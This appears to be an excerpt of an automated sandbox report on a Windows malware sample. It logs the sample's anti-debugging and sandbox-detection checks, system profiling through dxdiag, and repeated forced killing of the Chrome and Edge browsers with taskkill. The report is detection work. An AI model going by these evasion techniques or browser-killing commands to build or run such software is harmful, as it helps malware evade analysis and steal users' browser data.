Source: file.exe, 00000000.00000002.2104728384.00000000008BD000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000002.00000002.2148371254.000000000099D000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000003.00000002.2152160498.000000000099D000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_053203B3 rdtsc 0_2_053203B3
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12CD12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_00007FF7E12CD12C
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7E8DE80 GetModuleHandleW,LoadLibraryW,GetProcAddress,AddAccessAllowedAce,GetProcAddress,AddAccessDeniedAce,GetProcAddress,AddAccessAllowedAceEx,GetProcAddress,AddMandatoryAce,GetProcAddress,AddAccessAllowedObjectAce,GetProcAddress,AddAccessDeniedAceEx,GetProcAddress,AddAccessDeniedObjectAce,GetProcAddress,AddAuditAccessAceEx,GetProcAddress,AddAuditAccessObjectAce,GetProcAddress,SetSecurityDescriptorControl,InitializeCriticalSection,TlsAlloc,DeleteCriticalSection,TlsFree, 8_2_00007FF8B7E8DE80
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12E3480 GetProcessHeap, 7_2_00007FF7E12E3480
Enables debug privileges
Source: C:\Windows\System32\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12CD30C SetUnhandledExceptionFilter, 7_2_00007FF7E12CD30C
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12CD12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_00007FF7E12CD12C
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12DA614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_00007FF7E12DA614
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12CC8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 7_2_00007FF7E12CC8A0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF7E12CD30C SetUnhandledExceptionFilter, 8_2_00007FF7E12CD30C
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF7E12CD12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 8_2_00007FF7E12CD12C
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF7E12DA614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 8_2_00007FF7E12DA614
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF7E12CC8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 8_2_00007FF7E12CC8A0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7E8FBFC SetUnhandledExceptionFilter, 8_2_00007FF8B7E8FBFC
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7E8FA14 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 8_2_00007FF8B7E8FA14
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7E8E8FC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 8_2_00007FF8B7E8E8FC
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EC0854 SetUnhandledExceptionFilter, 8_2_00007FF8B7EC0854
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EBFA68 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 8_2_00007FF8B7EBFA68
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EC066C IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 8_2_00007FF8B7EC066C
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EE1A80 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 8_2_00007FF8B7EE1A80
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EE1030 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 8_2_00007FF8B7EE1030
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B8112920 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 8_2_00007FF8B8112920
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B8261960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 8_2_00007FF8B8261960
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B8261390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 8_2_00007FF8B8261390
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B8271390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 8_2_00007FF8B8271390
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B8271960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 8_2_00007FF8B8271960
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B8283248 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 8_2_00007FF8B8283248
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B8282C90 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 8_2_00007FF8B8282C90
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe "C:\Users\user\AppData\Local\Temp\1008029001\samat.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe "C:\Users\user\AppData\Local\Temp\1008029001\samat.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "dxdiag /t C:\Users\user\AppData\Local\Bunny\Info.txt" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\dxdiag.exe dxdiag /t C:\Users\user\AppData\Local\Bunny\Info.txt Jump to behavior
Uses taskkill to terminate processes
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7E87EB0 PyArg_ParseTuple,PyExc_TypeError,PyErr_SetString,GetSecurityDescriptorDacl,free,SetSecurityDescriptorDacl,GetSecurityDescriptorOwner,free,GetSecurityDescriptorGroup,free,free,free, 8_2_00007FF8B7E87EB0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7E88D60 PyArg_ParseTuple,PyErr_Clear,PyArg_ParseTuple,PyErr_Clear,PyArg_ParseTuple,PySequence_Check,PyExc_TypeError,PyErr_SetString,PySequence_Size,PySequence_Tuple,PyArg_ParseTuple,_Py_Dealloc,AllocateAndInitializeSid,PyExc_ValueError,PyErr_SetString,_Py_NewReference,malloc,memset,memcpy, 8_2_00007FF8B7E88D60
Source: skotes.exe, skotes.exe, 00000003.00000002.2152160498.000000000099D000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: }Program Manager
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12E9570 cpuid 7_2_00007FF7E12E9570
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: unknown VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: unknown VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\PublicKey VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\PublicKey VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Util VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\certifi VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\charset_normalizer VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor\importlib_metadata-8.0.0.dist-info VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor\importlib_metadata-8.0.0.dist-info VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor\wheel-0.43.0.dist-info VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor\wheel-0.43.0.dist-info VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor\wheel-0.43.0.dist-info VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor\wheel-0.43.0.dist-info VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools VolumeInformation Jump to behavior
